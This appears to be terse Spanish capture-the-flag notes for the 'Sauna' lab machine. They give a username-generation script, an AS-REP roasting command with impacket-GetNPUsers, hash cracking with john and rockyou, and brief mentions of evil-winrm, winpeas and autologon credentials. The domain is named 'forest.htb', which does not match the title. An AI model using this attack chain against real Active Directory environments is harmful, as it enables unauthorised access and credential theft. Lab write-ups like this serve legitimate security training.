Sauna

Con la web enumeramos posibles usuarios:

#!/bin/bash

# Listas de nombres y apellidos
nombres=("Fergus" "Shaun" "Hugo" "Bowie" "Sophie" "Steven")
apellidos=("Smith" "Coins" "Bear" "Taylor" "Driver" "Kerb")

# Crear el archivo
archivo="users.txt"
> "$archivo" # Limpiar el archivo si ya existe

# Generar variaciones de nombres y apellidos
for nombre in "${nombres[@]}"; do
    for apellido in "${apellidos[@]}"; do
        echo "${nombre}${apellido}" >> "$archivo"
        echo "${nombre:0:1}${apellido}" >> "$archivo"
        echo "${apellido}${nombre}" >> "$archivo"
        echo "${apellido:0:1}${nombre}" >> "$archivo"
    done
done

echo "Archivo creado con éxito."

impacket-GetNPUsers forest.htb/ -no-pass -usersfile users.txt

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Nos conectamos por evil-winrm y lanzamos winpeas:

Están en el autologon:

Nos conectamos con evil-winrm